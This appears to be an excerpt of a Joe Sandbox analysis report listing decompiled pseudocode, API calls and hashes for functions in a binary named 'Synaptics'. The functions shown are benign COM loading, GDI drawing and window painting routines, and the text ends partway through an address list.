                                                                                                                                                                                          Function 00478268 Relevance: 24.5, APIs: 7, Strings: 7, Instructions: 40libraryloaderCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                          			E00478268(intOrPtr* __eax, void* __edx, void* __esi) {
				intOrPtr* _t4;
				_Unknown_base(*)()* _t5;
				struct HINSTANCE__* _t12;

				 *((intOrPtr*)(__edx + __eax)) =  *((intOrPtr*)(__edx + __eax)) + __eax;
				 *__eax =  *__eax + __eax;
				 *__eax =  *__eax + __eax;
				_t4 = __eax + __eax;
				 *_t4 =  *_t4 + _t4;
				 *_t4 =  *_t4 + _t4;
				 *_t4 =  *_t4 + _t4;
				_t5 = GetModuleHandleA("ole32.dll");
				_t12 = _t5;
				if(_t12 != 0) {
					 *0x49c9cc = GetProcAddress(_t12, "CoCreateInstanceEx");
					 *0x49c9d0 = GetProcAddress(_t12, "CoInitializeEx");
					 *0x49c9d4 = GetProcAddress(_t12, "CoAddRefServerProcess");
					 *0x49c9d8 = GetProcAddress(_t12, "CoReleaseServerProcess");
					 *0x49c9dc = GetProcAddress(_t12, "CoResumeClassObjects");
					_t5 = GetProcAddress(_t12, "CoSuspendClassObjects");
					 *0x49c9e0 = _t5;
				}
				return _t5;
			}






                                                                                                                                                                                          0x00478268
                                                                                                                                                                                          0x0047826b
                                                                                                                                                                                          0x0047826d
                                                                                                                                                                                          0x0047826f
                                                                                                                                                                                          0x00478271
                                                                                                                                                                                          0x00478273
                                                                                                                                                                                          0x00478275
                                                                                                                                                                                          0x0047827e
                                                                                                                                                                                          0x00478283
                                                                                                                                                                                          0x00478287
                                                                                                                                                                                          0x00478294
                                                                                                                                                                                          0x004782a4
                                                                                                                                                                                          0x004782b4
                                                                                                                                                                                          0x004782c4
                                                                                                                                                                                          0x004782d4
                                                                                                                                                                                          0x004782df
                                                                                                                                                                                          0x004782e4
                                                                                                                                                                                          0x004782e4
                                                                                                                                                                                          0x004782ea

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(ole32.dll), ref: 0047827E
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,CoCreateInstanceEx), ref: 0047828F
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,CoInitializeEx), ref: 0047829F
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,CoAddRefServerProcess), ref: 004782AF
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,CoReleaseServerProcess), ref: 004782BF
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,CoResumeClassObjects), ref: 004782CF
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,CoSuspendClassObjects), ref: 004782DF
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000002.00000002.495377575.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000002.00000002.494336457.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000002.00000002.497313408.000000000049B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000002.00000002.497359973.00000000004A5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Synaptics.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: AddressProc$HandleModule
                                                                                                                                                                                          • String ID: CoAddRefServerProcess$CoCreateInstanceEx$CoInitializeEx$CoReleaseServerProcess$CoResumeClassObjects$CoSuspendClassObjects$ole32.dll
                                                                                                                                                                                          • API String ID: 667068680-2233174745
                                                                                                                                                                                          • Opcode ID: 7ba8e2c4f0dfdd8fef15a513eba99df2a8458c6260de3b235262294da52c1260
                                                                                                                                                                                          • Instruction ID: 1319bd0047e82110eb300eecde3395248effe05b75cadb67779d88dc7b717903
                                                                                                                                                                                          • Opcode Fuzzy Hash: 7ba8e2c4f0dfdd8fef15a513eba99df2a8458c6260de3b235262294da52c1260
                                                                                                                                                                                          • Instruction Fuzzy Hash: 16F044F09CE3C02ED30167790CA6A632F689912B0431491BFB808EA5D3C97D4804976E
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00429C0C Relevance: 21.2, APIs: 14, Instructions: 217windowCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 71%
                                                                                                                                                                                          			E00429C0C(intOrPtr* __eax, void* __ebx, signed int __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _v8;
				void* _v12;
				char _v13;
				struct tagPOINT _v21;
				struct HDC__* _v28;
				void* _v32;
				intOrPtr _t78;
				struct HDC__* _t80;
				signed int _t82;
				signed int _t83;
				signed int _t84;
				char _t85;
				void* _t92;
				struct HDC__* _t115;
				void* _t136;
				struct HDC__* _t160;
				intOrPtr* _t164;
				intOrPtr _t172;
				intOrPtr _t176;
				intOrPtr _t178;
				intOrPtr _t180;
				int* _t184;
				intOrPtr _t186;
				void* _t188;
				void* _t189;
				intOrPtr _t190;

				_t165 = __ecx;
				_t188 = _t189;
				_t190 = _t189 + 0xffffffe4;
				_t184 = __ecx;
				_v8 = __edx;
				_t164 = __eax;
				_t186 =  *((intOrPtr*)(__eax + 0x28));
				_t172 =  *0x429e58; // 0xf
				E00425D3C(_v8, __ecx, _t172);
				E0042A288(_t164);
				_v12 = 0;
				_v13 = 0;
				_t78 =  *((intOrPtr*)(_t186 + 0x10));
				if(_t78 != 0) {
					_push(0xffffffff);
					_push(_t78);
					_t160 =  *(_v8 + 4);
					_push(_t160);
					L00407440();
					_v12 = _t160;
					_push( *(_v8 + 4));
					L00407418();
					_v13 = 1;
				}
				_push(0xc);
				_t80 =  *(_v8 + 4);
				_push(_t80);
				L00407380();
				_push(_t80);
				_push(0xe);
				_t82 =  *(_v8 + 4);
				L00407380();
				_t83 = _t82;
				_t84 = _t83 * _t82;
				if(_t84 > 8) {
					L4:
					_t85 = 0;
				} else {
					_t165 =  *(_t186 + 0x28) & 0x0000ffff;
					if(_t84 < ( *(_t186 + 0x2a) & 0x0000ffff) * ( *(_t186 + 0x28) & 0x0000ffff)) {
						_t85 = 1;
					} else {
						goto L4;
					}
				}
				if(_t85 == 0) {
					if(E00429F98(_t164) == 0) {
						SetStretchBltMode(E00425C68(_v8), 3);
					}
				} else {
					GetBrushOrgEx( *(_v8 + 4),  &_v21);
					SetStretchBltMode( *(_v8 + 4), 4);
					SetBrushOrgEx( *(_v8 + 4), _v21, _v21.y,  &_v21);
				}
				_push(_t188);
				_push(0x429e48);
				_push( *[fs:eax]);
				 *[fs:eax] = _t190;
				if( *((intOrPtr*)( *_t164 + 0x28))() != 0) {
					E0042A228(_t164, _t165);
				}
				_t92 = E00429EDC(_t164);
				_t176 =  *0x429e58; // 0xf
				E00425D3C(_t92, _t165, _t176);
				if( *((intOrPtr*)( *_t164 + 0x28))() == 0) {
					StretchBlt( *(_v8 + 4),  *_t184, _t184[1], _t184[2] -  *_t184, _t184[3] - _t184[1],  *(E00429EDC(_t164) + 4), 0, 0,  *(_t186 + 0x1c),  *(_t186 + 0x20),  *(_v8 + 0x20));
					_pop(_t178);
					 *[fs:eax] = _t178;
					_push(0x429e4f);
					if(_v13 != 0) {
						_push(0xffffffff);
						_push(_v12);
						_t115 =  *(_v8 + 4);
						_push(_t115);
						L00407440();
						return _t115;
					}
					return 0;
				} else {
					_v32 = 0;
					_v28 = 0;
					_push(_t188);
					_push(0x429ddd);
					_push( *[fs:eax]);
					 *[fs:eax] = _t190;
					L004072E0();
					_v28 = E00426060(0);
					_v32 = SelectObject(_v28,  *(_t186 + 0xc));
					E00426204( *(_v8 + 4), _t164, _t184[1],  *_t184, _t184, _t186, 0, 0, _v28,  *(_t186 + 0x20),  *(_t186 + 0x1c), 0, 0,  *(E00429EDC(_t164) + 4), _t184[3] - _t184[1], _t184[2] -  *_t184);
					_t136 = 0;
					_t180 = 0;
					 *[fs:eax] = _t180;
					_push(0x429e22);
					if(_v32 != 0) {
						_t136 = SelectObject(_v28, _v32);
					}
					if(_v28 != 0) {
						return DeleteDC(_v28);
					}
					return _t136;
				}
			}





























                                                                                                                                                                                          0x00429c0c
                                                                                                                                                                                          0x00429c0d
                                                                                                                                                                                          0x00429c0f
                                                                                                                                                                                          0x00429c15
                                                                                                                                                                                          0x00429c17
                                                                                                                                                                                          0x00429c1a
                                                                                                                                                                                          0x00429c1c
                                                                                                                                                                                          0x00429c1f
                                                                                                                                                                                          0x00429c28
                                                                                                                                                                                          0x00429c2f
                                                                                                                                                                                          0x00429c36
                                                                                                                                                                                          0x00429c39
                                                                                                                                                                                          0x00429c3d
                                                                                                                                                                                          0x00429c42
                                                                                                                                                                                          0x00429c44
                                                                                                                                                                                          0x00429c46
                                                                                                                                                                                          0x00429c4a
                                                                                                                                                                                          0x00429c4d
                                                                                                                                                                                          0x00429c4e
                                                                                                                                                                                          0x00429c53
                                                                                                                                                                                          0x00429c5c
                                                                                                                                                                                          0x00429c5d
                                                                                                                                                                                          0x00429c62
                                                                                                                                                                                          0x00429c62
                                                                                                                                                                                          0x00429c66
                                                                                                                                                                                          0x00429c6b
                                                                                                                                                                                          0x00429c6e
                                                                                                                                                                                          0x00429c6f
                                                                                                                                                                                          0x00429c74
                                                                                                                                                                                          0x00429c75
                                                                                                                                                                                          0x00429c7a
                                                                                                                                                                                          0x00429c7e
                                                                                                                                                                                          0x00429c85
                                                                                                                                                                                          0x00429c86
                                                                                                                                                                                          0x00429c8b
                                                                                                                                                                                          0x00429c9c
                                                                                                                                                                                          0x00429c9c
                                                                                                                                                                                          0x00429c8d
                                                                                                                                                                                          0x00429c91
                                                                                                                                                                                          0x00429c9a
                                                                                                                                                                                          0x00429ca0
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00429c9a
                                                                                                                                                                                          0x00429ca4
                                                                                                                                                                                          0x00429ce7
                                                                                                                                                                                          0x00429cf4
                                                                                                                                                                                          0x00429cf4
                                                                                                                                                                                          0x00429ca6
                                                                                                                                                                                          0x00429cb1
                                                                                                                                                                                          0x00429cbf
                                                                                                                                                                                          0x00429cd7
                                                                                                                                                                                          0x00429cd7
                                                                                                                                                                                          0x00429cfb
                                                                                                                                                                                          0x00429cfc
                                                                                                                                                                                          0x00429d01
                                                                                                                                                                                          0x00429d04
                                                                                                                                                                                          0x00429d10
                                                                                                                                                                                          0x00429d14
                                                                                                                                                                                          0x00429d14
                                                                                                                                                                                          0x00429d1b
                                                                                                                                                                                          0x00429d20
                                                                                                                                                                                          0x00429d26
                                                                                                                                                                                          0x00429d34
                                                                                                                                                                                          0x00429e1d
                                                                                                                                                                                          0x00429e24
                                                                                                                                                                                          0x00429e27
                                                                                                                                                                                          0x00429e2a
                                                                                                                                                                                          0x00429e33
                                                                                                                                                                                          0x00429e35
                                                                                                                                                                                          0x00429e3a
                                                                                                                                                                                          0x00429e3e
                                                                                                                                                                                          0x00429e41
                                                                                                                                                                                          0x00429e42
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00429e42
                                                                                                                                                                                          0x00429e47
                                                                                                                                                                                          0x00429d3a
                                                                                                                                                                                          0x00429d3c
                                                                                                                                                                                          0x00429d41
                                                                                                                                                                                          0x00429d46
                                                                                                                                                                                          0x00429d47
                                                                                                                                                                                          0x00429d4c
                                                                                                                                                                                          0x00429d4f
                                                                                                                                                                                          0x00429d54
                                                                                                                                                                                          0x00429d5e
                                                                                                                                                                                          0x00429d6e
                                                                                                                                                                                          0x00429da8
                                                                                                                                                                                          0x00429dad
                                                                                                                                                                                          0x00429daf
                                                                                                                                                                                          0x00429db2
                                                                                                                                                                                          0x00429db5
                                                                                                                                                                                          0x00429dbe
                                                                                                                                                                                          0x00429dc8
                                                                                                                                                                                          0x00429dc8
                                                                                                                                                                                          0x00429dd1
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00429dd7
                                                                                                                                                                                          0x00429ddc
                                                                                                                                                                                          0x00429ddc

                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 0042A288: 73CCAC50.USER32(00000000,?,?,?,?,00428DD3,00000000,00428E5F), ref: 0042A2DE
                                                                                                                                                                                            • Part of subcall function 0042A288: 73CCAD70.GDI32(00000000,0000000C,00000000,?,?,?,?,00428DD3,00000000,00428E5F), ref: 0042A2F3
                                                                                                                                                                                            • Part of subcall function 0042A288: 73CCAD70.GDI32(00000000,0000000E,00000000,0000000C,00000000,?,?,?,?,00428DD3,00000000,00428E5F), ref: 0042A2FD
                                                                                                                                                                                            • Part of subcall function 0042A288: CreateHalftonePalette.GDI32(00000000,00000000,?,?,?,?,00428DD3,00000000,00428E5F), ref: 0042A321
                                                                                                                                                                                            • Part of subcall function 0042A288: 73CCB380.USER32(00000000,00000000,00000000,?,?,?,?,00428DD3,00000000,00428E5F), ref: 0042A32C
                                                                                                                                                                                          • 73CCB410.GDI32(?,?,000000FF), ref: 00429C4E
                                                                                                                                                                                          • 73CCB150.GDI32(?,?,?,000000FF), ref: 00429C5D
                                                                                                                                                                                          • 73CCAD70.GDI32(?,0000000C), ref: 00429C6F
                                                                                                                                                                                          • 73CCAD70.GDI32(?,0000000E,00000000,?,0000000C), ref: 00429C7E
                                                                                                                                                                                          • GetBrushOrgEx.GDI32(?,?,0000000E,00000000,?,0000000C), ref: 00429CB1
                                                                                                                                                                                          • SetStretchBltMode.GDI32(?,00000004), ref: 00429CBF
                                                                                                                                                                                          • SetBrushOrgEx.GDI32(?,?,?,?,?,00000004,?,?,0000000E,00000000,?,0000000C), ref: 00429CD7
                                                                                                                                                                                          • SetStretchBltMode.GDI32(00000000,00000003), ref: 00429CF4
                                                                                                                                                                                          • 73CCA590.GDI32(00000000,00000000,00429DDD,?,?,0000000E,00000000,?,0000000C), ref: 00429D54
                                                                                                                                                                                          • SelectObject.GDI32(?,?), ref: 00429D69
                                                                                                                                                                                          • SelectObject.GDI32(?,00000000), ref: 00429DC8
                                                                                                                                                                                          • DeleteDC.GDI32(00000000), ref: 00429DD7
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000002.00000002.495377575.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000002.00000002.494336457.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000002.00000002.497313408.000000000049B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000002.00000002.497359973.00000000004A5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Synaptics.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: BrushModeObjectSelectStretch$A590B150B380B410CreateDeleteHalftonePalette
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 2051775979-0
                                                                                                                                                                                          • Opcode ID: 87855e273eaf687ce69033d36cdea586d3e77b5215029b26395c9e81f2032ec1
                                                                                                                                                                                          • Instruction ID: 4bdc1ec2b254633c36354ca88bbdad4dffc819a4d2a14069678e4514baf45347
                                                                                                                                                                                          • Opcode Fuzzy Hash: 87855e273eaf687ce69033d36cdea586d3e77b5215029b26395c9e81f2032ec1
                                                                                                                                                                                          • Instruction Fuzzy Hash: C4714675B04205AFDB40DFA9D985F5EBBF8AF08304F5585AAB508E7391C638ED00CB68
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00426070 Relevance: 21.1, APIs: 14, Instructions: 131windowCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 51%
                                                                                                                                                                                          			E00426070(struct HDC__* __eax, void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi) {
				void* _v8;
				int _v12;
				int _v16;
				void* _v20;
				int _v24;
				struct HDC__* _v28;
				struct HDC__* _v32;
				int _v48;
				int _v52;
				void _v56;
				int _t37;
				void* _t41;
				int _t43;
				void* _t47;
				void* _t72;
				intOrPtr _t79;
				intOrPtr _t80;
				void* _t85;
				void* _t87;
				void* _t88;
				intOrPtr _t89;

				_t87 = _t88;
				_t89 = _t88 + 0xffffffcc;
				asm("movsd");
				asm("movsd");
				_t71 = __ecx;
				_v8 = __eax;
				_push(0);
				L004072E0();
				_v28 = __eax;
				_push(0);
				L004072E0();
				_v32 = __eax;
				_push(_t87);
				_push(0x4261be);
				_push( *[fs:eax]);
				 *[fs:eax] = _t89;
				_t37 = GetObjectA(_v8, 0x18,  &_v56);
				if(__ecx == 0) {
					_push(0);
					L00407638();
					_v24 = _t37;
					if(_v24 == 0) {
						E00425FB8(__ecx);
					}
					_push(_t87);
					_push(0x42612d);
					_push( *[fs:eax]);
					 *[fs:eax] = _t89;
					_push(_v12);
					_push(_v16);
					_t41 = _v24;
					_push(_t41);
					L004072D8();
					_v20 = _t41;
					if(_v20 == 0) {
						E00425FB8(_t71);
					}
					_pop(_t79);
					 *[fs:eax] = _t79;
					_push(0x426134);
					_t43 = _v24;
					_push(_t43);
					_push(0);
					L00407888();
					return _t43;
				} else {
					_push(0);
					_push(1);
					_push(1);
					_push(_v12);
					_t47 = _v16;
					_push(_t47);
					L004072C8();
					_v20 = _t47;
					if(_v20 != 0) {
						_t72 = SelectObject(_v28, _v8);
						_t85 = SelectObject(_v32, _v20);
						StretchBlt(_v32, 0, 0, _v16, _v12, _v28, 0, 0, _v52, _v48, 0xcc0020);
						if(_t72 != 0) {
							SelectObject(_v28, _t72);
						}
						if(_t85 != 0) {
							SelectObject(_v32, _t85);
						}
					}
					_pop(_t80);
					 *[fs:eax] = _t80;
					_push(0x4261c5);
					DeleteDC(_v28);
					return DeleteDC(_v32);
				}
			}
























                                                                                                                                                                                          0x00426071
                                                                                                                                                                                          0x00426073
                                                                                                                                                                                          0x0042607e
                                                                                                                                                                                          0x0042607f
                                                                                                                                                                                          0x00426080
                                                                                                                                                                                          0x00426082
                                                                                                                                                                                          0x00426085
                                                                                                                                                                                          0x00426087
                                                                                                                                                                                          0x0042608c
                                                                                                                                                                                          0x0042608f
                                                                                                                                                                                          0x00426091
                                                                                                                                                                                          0x00426096
                                                                                                                                                                                          0x0042609b
                                                                                                                                                                                          0x0042609c
                                                                                                                                                                                          0x004260a1
                                                                                                                                                                                          0x004260a4
                                                                                                                                                                                          0x004260b1
                                                                                                                                                                                          0x004260b8
                                                                                                                                                                                          0x004260d2
                                                                                                                                                                                          0x004260d4
                                                                                                                                                                                          0x004260d9
                                                                                                                                                                                          0x004260e0
                                                                                                                                                                                          0x004260e2
                                                                                                                                                                                          0x004260e2
                                                                                                                                                                                          0x004260e9
                                                                                                                                                                                          0x004260ea
                                                                                                                                                                                          0x004260ef
                                                                                                                                                                                          0x004260f2
                                                                                                                                                                                          0x004260f8
                                                                                                                                                                                          0x004260fc
                                                                                                                                                                                          0x004260fd
                                                                                                                                                                                          0x00426100
                                                                                                                                                                                          0x00426101
                                                                                                                                                                                          0x00426106
                                                                                                                                                                                          0x0042610d
                                                                                                                                                                                          0x0042610f
                                                                                                                                                                                          0x0042610f
                                                                                                                                                                                          0x00426116
                                                                                                                                                                                          0x00426119
                                                                                                                                                                                          0x0042611c
                                                                                                                                                                                          0x00426121
                                                                                                                                                                                          0x00426124
                                                                                                                                                                                          0x00426125
                                                                                                                                                                                          0x00426127
                                                                                                                                                                                          0x0042612c
                                                                                                                                                                                          0x004260ba
                                                                                                                                                                                          0x004260ba
                                                                                                                                                                                          0x004260bc
                                                                                                                                                                                          0x004260be
                                                                                                                                                                                          0x004260c3
                                                                                                                                                                                          0x004260c4
                                                                                                                                                                                          0x004260c7
                                                                                                                                                                                          0x004260c8
                                                                                                                                                                                          0x004260cd
                                                                                                                                                                                          0x00426138
                                                                                                                                                                                          0x00426147
                                                                                                                                                                                          0x00426156
                                                                                                                                                                                          0x0042617d
                                                                                                                                                                                          0x00426184
                                                                                                                                                                                          0x0042618b
                                                                                                                                                                                          0x0042618b
                                                                                                                                                                                          0x00426192
                                                                                                                                                                                          0x00426199
                                                                                                                                                                                          0x00426199
                                                                                                                                                                                          0x00426192
                                                                                                                                                                                          0x004261a0
                                                                                                                                                                                          0x004261a3
                                                                                                                                                                                          0x004261a6
                                                                                                                                                                                          0x004261af
                                                                                                                                                                                          0x004261bd
                                                                                                                                                                                          0x004261bd

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • 73CCA590.GDI32(00000000), ref: 00426087
                                                                                                                                                                                          • 73CCA590.GDI32(00000000,00000000), ref: 00426091
                                                                                                                                                                                          • GetObjectA.GDI32(?,00000018,?), ref: 004260B1
                                                                                                                                                                                          • 73CCA410.GDI32(?,?,00000001,00000001,00000000,?,00000018,?,00000000,004261BE,?,00000000,00000000), ref: 004260C8
                                                                                                                                                                                          • 73CCAC50.USER32(00000000,?,00000018,?,00000000,004261BE,?,00000000,00000000), ref: 004260D4
                                                                                                                                                                                          • 73CCA520.GDI32(00000000,?,?,00000000,0042612D,?,00000000,?,00000018,?,00000000,004261BE,?,00000000,00000000), ref: 00426101
                                                                                                                                                                                          • 73CCB380.USER32(00000000,00000000,00426134,00000000,0042612D,?,00000000,?,00000018,?,00000000,004261BE,?,00000000,00000000), ref: 00426127
                                                                                                                                                                                          • SelectObject.GDI32(?,?), ref: 00426142
                                                                                                                                                                                          • SelectObject.GDI32(?,00000000), ref: 00426151
                                                                                                                                                                                          • StretchBlt.GDI32(?,00000000,00000000,?,?,?,00000000,00000000,?,?,00CC0020), ref: 0042617D
                                                                                                                                                                                          • SelectObject.GDI32(?,00000000), ref: 0042618B
                                                                                                                                                                                          • SelectObject.GDI32(?,00000000), ref: 00426199
                                                                                                                                                                                          • DeleteDC.GDI32(?), ref: 004261AF
                                                                                                                                                                                          • DeleteDC.GDI32(?), ref: 004261B8
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000002.00000002.495377575.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000002.00000002.494336457.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000002.00000002.497313408.000000000049B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000002.00000002.497359973.00000000004A5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Synaptics.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Object$Select$A590Delete$A410A520B380Stretch
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 956127455-0
                                                                                                                                                                                          • Opcode ID: b939bd58d8576efde727da06b39e28273c11fb0ae0a4339bc6659599a28bf24a
                                                                                                                                                                                          • Instruction ID: 23bfd75d1e5f7ab71a99e75aee45f16e7152ef54e2d5d773258edcec8bfffe0d
                                                                                                                                                                                          • Opcode Fuzzy Hash: b939bd58d8576efde727da06b39e28273c11fb0ae0a4339bc6659599a28bf24a
                                                                                                                                                                                          • Instruction Fuzzy Hash: 9D411271E04219AFDB10DBE9DC42FAFB7BCEB08704F91446AB604F7281C67869108769
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 004424F8 Relevance: 19.7, APIs: 13, Instructions: 224COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 55%
                                                                                                                                                                                          			E004424F8(intOrPtr* __eax, intOrPtr __edx) {
				intOrPtr* _v8;
				intOrPtr _v12;
				struct HDC__* _v16;
				struct tagRECT _v32;
				struct tagRECT _v48;
				void* _v64;
				struct HDC__* _t120;
				void* _t171;
				intOrPtr* _t193;
				intOrPtr* _t196;
				intOrPtr _t205;
				void* _t208;
				intOrPtr _t216;
				signed int _t234;
				void* _t237;
				void* _t239;
				intOrPtr _t240;

				_t237 = _t239;
				_t240 = _t239 + 0xffffffc4;
				_v12 = __edx;
				_v8 = __eax;
				if( *(_v8 + 0x165) != 0 ||  *(_v8 + 0x16c) > 0) {
					_t120 = E00441704(_v8);
					_push(_t120);
					L00407730();
					_v16 = _t120;
					_push(_t237);
					_push(0x44275e);
					_push( *[fs:edx]);
					 *[fs:edx] = _t240;
					GetClientRect(E00441704(_v8),  &_v32);
					GetWindowRect(E00441704(_v8),  &_v48);
					MapWindowPoints(0, E00441704(_v8),  &_v48, 2);
					OffsetRect( &_v32,  ~(_v48.left),  ~(_v48.top));
					ExcludeClipRect(_v16, _v32, _v32.top, _v32.right, _v32.bottom);
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					InflateRect( &_v32,  *(_v8 + 0x16c),  *(_v8 + 0x16c));
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					if( *(_v8 + 0x165) != 0) {
						_t208 = 0;
						if( *(_v8 + 0x163) != 0) {
							_t208 = 0 +  *((intOrPtr*)(_v8 + 0x168));
						}
						if( *(_v8 + 0x164) != 0) {
							_t208 = _t208 +  *((intOrPtr*)(_v8 + 0x168));
						}
						_t234 = GetWindowLongA(E00441704(_v8), 0xfffffff0);
						if(( *(_v8 + 0x162) & 0x00000001) != 0) {
							_v48.left = _v48.left - _t208;
						}
						if(( *(_v8 + 0x162) & 0x00000002) != 0) {
							_v48.top = _v48.top - _t208;
						}
						if(( *(_v8 + 0x162) & 0x00000004) != 0) {
							_v48.right = _v48.right + _t208;
						}
						if((_t234 & 0x00200000) != 0) {
							_t196 =  *0x49d970; // 0x49e900
							_v48.right = _v48.right +  *((intOrPtr*)( *_t196))(0x14);
						}
						if(( *(_v8 + 0x162) & 0x00000008) != 0) {
							_v48.bottom = _v48.bottom + _t208;
						}
						if((_t234 & 0x00100000) != 0) {
							_t193 =  *0x49d970; // 0x49e900
							_v48.bottom = _v48.bottom +  *((intOrPtr*)( *_t193))(0x15);
						}
						DrawEdge(_v16,  &_v48,  *(0x49bcec + ( *(_v8 + 0x163) & 0x000000ff) * 4) |  *(0x49bcfc + ( *(_v8 + 0x164) & 0x000000ff) * 4),  *(_v8 + 0x162) & 0x000000ff |  *(0x49bd0c + ( *(_v8 + 0x165) & 0x000000ff) * 4) |  *(0x49bd1c + ( *(_v8 + 0x1a5) & 0x000000ff) * 4) | 0x00002000);
					}
					IntersectClipRect(_v16, _v48.left, _v48.top, _v48.right, _v48.bottom);
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					OffsetRect( &_v48,  ~_v48,  ~(_v48.top));
					FillRect(_v16,  &_v48, E00425610( *((intOrPtr*)(_v8 + 0x170))));
					_pop(_t216);
					 *[fs:eax] = _t216;
					_push(0x442765);
					_push(_v16);
					_t171 = E00441704(_v8);
					_push(_t171);
					L00407888();
					return _t171;
				} else {
					 *((intOrPtr*)( *_v8 - 0x10))();
					_t205 = E004329D8(E004328F8());
					if(_t205 != 0) {
						_t205 = _v8;
						if(( *(_t205 + 0x52) & 0x00000002) != 0) {
							_t205 = E00432F08(E004328F8(), 0, _v8);
						}
					}
					return _t205;
				}
			}




















                                                                                                                                                                                          0x004424f9
                                                                                                                                                                                          0x004424fb
                                                                                                                                                                                          0x00442501
                                                                                                                                                                                          0x00442504
                                                                                                                                                                                          0x00442511
                                                                                                                                                                                          0x00442526
                                                                                                                                                                                          0x0044252b
                                                                                                                                                                                          0x0044252c
                                                                                                                                                                                          0x00442531
                                                                                                                                                                                          0x00442536
                                                                                                                                                                                          0x00442537
                                                                                                                                                                                          0x0044253c
                                                                                                                                                                                          0x0044253f
                                                                                                                                                                                          0x0044254f
                                                                                                                                                                                          0x00442561
                                                                                                                                                                                          0x00442577
                                                                                                                                                                                          0x0044258c
                                                                                                                                                                                          0x004425a5
                                                                                                                                                                                          0x004425b0
                                                                                                                                                                                          0x004425b1
                                                                                                                                                                                          0x004425b2
                                                                                                                                                                                          0x004425b3
                                                                                                                                                                                          0x004425c3
                                                                                                                                                                                          0x004425ce
                                                                                                                                                                                          0x004425cf
                                                                                                                                                                                          0x004425d0
                                                                                                                                                                                          0x004425d1
                                                                                                                                                                                          0x004425dc
                                                                                                                                                                                          0x004425e2
                                                                                                                                                                                          0x004425ee
                                                                                                                                                                                          0x004425f3
                                                                                                                                                                                          0x004425f3
                                                                                                                                                                                          0x00442603
                                                                                                                                                                                          0x00442608
                                                                                                                                                                                          0x00442608
                                                                                                                                                                                          0x0044261e
                                                                                                                                                                                          0x0044262a
                                                                                                                                                                                          0x0044262c
                                                                                                                                                                                          0x0044262c
                                                                                                                                                                                          0x00442639
                                                                                                                                                                                          0x0044263b
                                                                                                                                                                                          0x0044263b
                                                                                                                                                                                          0x00442648
                                                                                                                                                                                          0x0044264a
                                                                                                                                                                                          0x0044264a
                                                                                                                                                                                          0x00442653
                                                                                                                                                                                          0x00442657
                                                                                                                                                                                          0x00442660
                                                                                                                                                                                          0x00442660
                                                                                                                                                                                          0x0044266d
                                                                                                                                                                                          0x0044266f
                                                                                                                                                                                          0x0044266f
                                                                                                                                                                                          0x00442678
                                                                                                                                                                                          0x0044267c
